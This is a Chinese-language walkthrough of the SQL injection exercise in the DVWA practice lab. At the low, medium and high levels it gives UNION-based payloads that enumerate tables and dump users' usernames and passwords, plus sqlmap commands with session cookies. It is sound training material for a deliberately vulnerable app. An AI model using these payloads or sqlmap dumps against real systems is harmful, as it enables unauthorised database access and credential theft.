dvwa第一题:SQL Injection

---level: low---

该级别的网页会把服务器报错信息和查询数据显示出来。

#寻找注入点

http://localhost/vulnerabilities/sqli/?id=1

http://localhost/vulnerabilities/sqli/?id=1'

http://localhost/vulnerabilities/sqli/?id=1' and 1=1

http://localhost/vulnerabilities/sqli/?id=1' and 1=2

#正常参数
http://localhost/vulnerabilities/sqli/?id=1&Submit=Submit

#查询是否为注入点
http://localhost/vulnerabilities/sqli/?id=1'&Submit=Submit

#爆数据库
http://localhost/vulnerabilities/sqli/?id=1' union select 1,database()-- &Submit=Submit

#爆库表
http://localhost/vulnerabilities/sqli/?id=1' union select 1,table_name from information_schema.tables where table_schema='dvwa'-- &Submit=Submit

#爆表字段
http://localhost/vulnerabilities/sqli/?id=1' union select 1,column_name from information_schema.columns where TABLE_NAME='users'-- &Submit=Submit

#表数据
http://localhost/vulnerabilities/sqli/?id=1' union select 1,concat(user,password) from users-- &Submit=Submit

 

 

 

 

---level: medium---
post请求数据,url中不可见,需要用blurpsuite,并且服务后台做了特殊字符转义,所以sql语句不能使用\x00,\n,\r,\,’,”,\x1a,具体的值通过sql语句获得。

#爆当前使用数据库名

id=2 union select 1, table_name from information_schema.tables where table_schema=database()-- &Submit=Submit

#爆表名
select table_name from information_schema.tables where table_schema=database()

#爆字段
id=2 union select 1, column_name from information_schema.columns where table_name=(select table_name from information_schema.tables where table_schema=database() limit 1,1)-- &Submit=Submit

#爆数据
id=1 union select 1, concat(user,password) from users-- &Submit=Submit

sqlmap -u "http://192.168.43.140/vulnerabilities/sqli" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=q5fhguekr1jlmp3dnggoahajbt; security=medium" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

 

 

 

 

---level: high---

跟之前级别一样,只是多了个二阶注入,注入点页面和结果页面为两个页面。
sqlmap -u "192.168.43.140/vulnerabilities/sqli/session-input.php#" --second-url "http://192.168.43.140/vulnerabilities/sqli" --data "id=1&Submit=Submit#" --cookie="PHPSESSID=1sfidb68smb7koe3j0o7m44hf7; security=high" --batch -D dvwa -T users -C user,first_name,last_name,password,user_id --dump

 

 

 

---level: impossible---

后台采用Anti-CSRF token机制,有效提高了安全机制,并使用预编译存储过程加强了参数的合法性

 

 

 

 

环境:

dbms:mysql
ossystem:win server2016
dwvaserver
apache
php

你可能感兴趣的:(main之dvwa)